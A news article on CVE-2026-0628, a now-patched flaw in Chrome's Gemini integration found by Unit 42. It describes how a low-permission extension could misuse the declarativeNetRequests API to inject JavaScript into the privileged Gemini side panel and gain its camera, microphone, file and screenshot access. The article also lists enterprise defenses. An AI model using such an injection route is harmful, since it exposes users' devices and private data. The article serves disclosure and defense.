Google has resolved a high-severity vulnerability in its implementation of Gemini AI within the Chrome browser. Prior to the fix, the condition could have allowed threat actors to escalate privileges, access private user data, and interact with sensitive system resources. Security researchers note that this finding illustrates the evolving risk models associated with agentic browsers that feature native AI integration.
Tracked as CVE-2026-0628, the vulnerability could have enabled unsafe browser extensions with basic permissions to escalate privileges. This condition allowed unauthorized access to an affected user's camera and microphone, local files and directories, and the ability to capture screenshots of active websites. Researchers from Palo Alto Networks' Unit 42 discovered and reported the issue.
"The vulnerability put any user of the new Gemini feature in Chrome at risk of system compromise if they had installed a malicious extension," Gal Weizman, senior principal researcher at Palo Alto Networks, stated in the disclosure. "Beyond individual users, the risk profile was significantly amplified within business and organizational environments."
The Gemini Live feature in Chrome operates within a privileged side panel. This placement grants the AI elevated capabilities to interact with local system resources and access on-screen content to complete complex tasks. Many modern browsers now integrate agentic AI capabilities to process data and execute multistep operations that previously required manual user intervention.
While these expanded capabilities improve usability, they also introduce a widened exposure area for both home and corporate users. "This creates security implications that are not present in traditional browsers," Weizman noted.
Technical mechanism and resolution
Unit 42 researchers identified the vulnerability through an interaction with the "declarativeNetRequests" API, which failed to maintain a proper security boundary. This failure "allowed permissions that could have enabled an attacker to inject JavaScript code into the new Gemini panel," Weizman documented in the report.
The declarativeNetRequests API function serves legitimate purposes, such as enabling content blockers to stop requests that lead to privacy-invasive advertisements. Under normal circumstances, when loaded into a typical browser tab, this design functions safely.
The security issue emerged specifically from how Gemini AI integrated with the browser component. The flaw allowed code injection to execute when the application loaded within the highly privileged Gemini side panel, where "Chrome hooks it with access to powerful capabilities," according to Weizman. Because the Gemini application requires access to local files, screenshots, and audio-visual hardware to perform its tasks, gaining unauthorized control over this specific panel granted those same capabilities to the injected code.
Unit 42 demonstrated the vulnerability conditions to Google in October. Google successfully reproduced the issue and subsequently deployed a patch in early January to secure the boundary.
Securing agentic AI browser architectures
As AI integrations become standard, the proactive nature of agentic technology requires a shift in traditional browser security models. Unlike standard browsers that primarily display content, AI agents actively evaluate and act upon the data they process.
"These agents can inherit a user's authenticated browser session and perform privileged actions inside enterprise applications, including modifying data or triggering workflows," says Anupam Upadhyaya, senior vice president of product management for Palo Alto Networks' Prisma SASE.
Securing these environments requires developers to build native, continuous, and policy-enforced security directly into the browser architecture. Upadhyaya recommends that design teams integrate real-time inspection of user prompts, AI responses, and rendered content at the exact point where users, data, and AI interact.
For enterprise security teams, adapting to this new architecture means recognizing that traditional network and endpoint controls were not designed to monitor native AI browser interactions. Organizations can strengthen their defenses by treating the browser as both a primary security perimeter and a control plane.
Practical steps for organizations include:
Gaining visibility into which AI browsers and extensions are currently active within the environment.
Implementing in-browser monitoring for user navigation, data uploads, copy/paste activity, and extension behavior.
Enforcing policy controls in real time before sensitive data leaves the browser environment.